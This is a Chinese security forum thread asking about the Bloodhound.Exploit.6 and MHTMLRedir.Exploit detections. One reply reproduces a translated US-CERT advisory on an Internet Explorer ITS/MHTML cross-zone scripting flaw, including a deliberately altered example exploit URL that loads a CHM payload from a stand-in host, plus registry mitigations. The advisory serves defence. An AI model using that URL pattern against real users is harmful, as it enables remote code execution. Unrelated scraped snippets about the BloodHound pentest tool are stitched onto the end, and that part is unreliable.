社区
安全技术/病毒
帖子详情
Bloodhound.Exploit.6 和 MHTMLRedir.Exploit 是什么病毒?怎么清除!
atliu
2005-01-28 09:01:47
如上
...全文
1034
4
打赏
收藏
Bloodhound.Exploit.6 和 MHTMLRedir.Exploit 是什么病毒?怎么清除!
如上
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
4 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
gamedna
2005-01-30
打赏
举报
回复
跟一下
Jes_Blue
2005-01-30
打赏
举报
回复
网页可以包含恶意程序
donghid
2005-01-29
打赏
举报
回复
有包含病毒的网址吗?
oyljerry
2005-01-28
打赏
举报
回复
★Bloodhound.Exploit.6病毒专题★
点击:6566次
一、安全公告编号
US-CERT:TA04-099A
二、影响范围
运行Internet Explorer的 Microsoft Windows 系统
三、漏洞描述
ITS 协议处理机制中存在一个交叉域脚本漏洞,ITS协议处理机制决定了存储在一个已编译HTML帮助 (CHM)文件中HTML组件的安全域。HTML帮助系统"……运用Microsoft Internet Explorer下列组件显示帮助内容。他支持HTML, ActiveX, Java,和脚本语言(JScript, 和Microsoft Visual Basic Scripting Edition)。"CHM文件运用InfoTech Storage (ITS)格式存储HTML 文件, graphic 文件, 和ActiveX 对象这一类的组件。IE提供多种协议处理程序,能够访问ITS文件和单独的CHM组件:its:, ms-its:, ms-itss:,以及mk:@MSITStore:。IE也有访问部分运用mhtml:协议处理机制的MIME封装的HTML集合文件包(MHTML)的能力。
当IE引用一个使用ITS和mhtml:协议的不可访问或是不存在的MHTML文件时,ITS协议处理机制能够通过一个替代资源访问到CHM文件。IE错误地将CHM文件看作和不可使用的MHTML文件在同一个域中。运用特殊处理的URL,攻击者能够导致CHM文件中的任意脚本在不同域中执行,这与交叉域的安全模式相违背。
任何使用WebBrowser ActiveX 控件或是IE HTML 翻译机制 (MSHTML)的程序会受到此漏洞影响。例如Internet Explorer, Outlook, 和 Outlook Express 都是此类程序。任何程序,包括其他网络浏览器,使用这个IE协议处理机制(URL名字)的都可以被攻击。同样,由于IE决定MIME类型,HTML和CHM文件不会有预期的文件扩展名(.htm/.html/.chm )。
注意:
使用替代的网络浏览器不会减轻此漏洞的危害。使用与Windows 系统中调用IE来处理ITS协议URLs机制不同的其他网络浏览器也许可以避免这个漏洞。
四、危害描述
通过诱导受害者去浏览一个HTML文档例如网页或者HTML的邮件信息,攻击者能在包含攻击文档的域以外的域中运行脚本。通过在Local Machine域中运行脚本,攻击者能够利用运行IE的用户的权限执行任意代码。攻击者也可以读取或更改其他网站数据(包括读取cookies 或内容以及更改或者创建内容)。
现已存在针对此漏洞的攻击代码。US-CERT已经监测到的安全事件表明这个漏洞已经被利用。Ibiza trojan, W32/Bugbear的变种和BloodHound.Exploit.6 是利用此漏洞的恶意代码中的一些例子。值得注意的是任意执行的恶意代码经此漏洞传递,不同的防病毒厂商能够以不同的名称识别这些恶意代码。
一个恶意网址或邮件信息可能包含类似如下内容的HTML:ms_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html
(此 URL故意进行了修正避免防病毒软件的检测)
在这个例子中,HTML和exploit.html中的脚本将会在Local Machine 域的安全上下文中执行。exploit.html通常会包含或者下载一个可运行的净荷,例如,后门、特洛伊木马、病毒或其他恶意代码。
注意,通过加密URL可能绕过HTTP内容检查或防病毒软件。
五、解决方案
现在没有针对这个漏洞的完整解决方案。在补丁发布之前,可以参照下面的列表内容来预防。
1.关闭ITS协议处理
关闭ITS协议处理程序目的在于避免该漏洞被利用。删除或修改下面的注册键名称: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
关闭这些协议处理程序将明显的减少Windows帮助系统的功能,并且可能导致其它的意外结果。在相关补丁测试并安装之后,应该撤消这些修改。
2.遵循好的互联网安全惯例。
这些推荐的安全措施将帮助减少被攻击的可能和减轻交叉域漏洞的影响。
3.关闭活动脚本和ActiveX控件
注意: 关闭活动脚本和ActiveX控件可能不会阻止该漏洞被利用。
在Local Machine域中关闭活动脚本和ActiveX控件可以停止一些类型的攻击和阻止利用不同的交叉域漏洞。在任何用来阅读HTML邮件的域中关闭活动脚本和ActiveX控件。
在Local Machine域中关闭活动脚本和ActiveX控件可以阻止某些利用活动脚本和ActiveX控件的恶意代码的运行。改变这些设置可能会减少脚本,Applet,Windows组件或者其他应用程序的功能。请参阅微软知识库833633号文章了解Local Machine Zone 安全设置的具体信息。注意在Windows XP SP2中包括了这个改变。
4.不要使用未确定的链接
不要点击在邮件,即时信息,web论坛或者IRC频道中的不确URL.。
5.维护升级防病毒软件
升级病毒定义库后的防病毒软件可以识别和阻止一些攻击企图。各种各样的刺探和攻击不可能完全被侦测到。不要指望单单依赖防病毒软件就可以防止该漏洞。更多的病毒及反病毒软件信息可以从http://www.us-cert.gov/other_sources/viruses.html网站获得
六、参考
US-CERT安全公告TA04-099A:http://www.us-cert.gov/cas/techalerts/TA04-099A.html
BloodHound
.py:基于Python的
BloodHound
摄取器
BloodHound
.py
BloodHound
.py是一个基于Python的摄取器,根据 。 此版本的
BloodHound
.py仅与
BloodHound
3.0或更高版本兼容。 局限性
BloodHound
.py当前具有以下限制: 支持大多数(但不是全部)
BloodHound
(SharpHound)功能(有关支持的收集方法,请参阅下文,主要缺少基于GPO的方法) Kerberos身份验证支持尚未完成 安装及使用 您可以使用pip install
bloodhound
bloodhound
通过pip安装摄取器,也可以通过克隆此存储库并运行python setup.py install或pip install .来安装摄取器pip install . 。
BloodHound
.py需要impacket , ldap3和dnspython运作。 安装将在命令行中添加命令行工具bloo
C# Data Collector for
BloodHound
.zip
C# Data Collector for
BloodHound
PyPI 官网下载 |
bloodhound
-1.0.5.tar.gz
资源来自pypi官网。 资源全名:
bloodhound
-1.0.5.tar.gz
初级java笔试题-
bloodhound
-elementary:用于分析
bloodhound
.py或sharphound生成的.json文件的
初级java笔试题猎犬小学 用于分析由 .json 生成或用于 .json 文件的命令行工具。 为什么?
Bloodhound
本身是一个很棒的信息收集工具,用于安全审计和渗透测试。 但是,它有一些重量级的依赖项(Java 和 Neo4J)并且需要一个 GUI。 因此编写 Elementary 是为了提供一种用于分析相同数据的轻量级替代方案。 它只需要 Python 3.5 或更高版本,并且没有额外的库依赖项。 Elementary 可以列出和描述域、用户、组和计算机。 它还可以跟踪路径(例如从用户到组)并建议目标。 入门 首先确保您安装了 Python 3.5 或更高版本,以便从命令行键入python --version产生预期的结果。 然后克隆这个 repo。 实际上,您只需要elementary.py和elementary_data.py。 然后从安装文件夹你可以运行: python ./elementary.py
where 是包含
Bloodhound
json 文件的文件夹的路径。 如果你做的一切都正确,输出应该显示你加载到内存中的内容,例如: Startin
BloodHound
,谷歌分析的微型跟踪库。.zip
使用谷歌分析和/或Firebase分析跟踪屏幕和事件的微型库。
安全技术/病毒
9,515
社区成员
28,941
社区内容
发帖
与我相关
我的任务
安全技术/病毒
Windows专区 安全技术/病毒
复制链接
扫一扫
分享
社区描述
Windows专区 安全技术/病毒
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章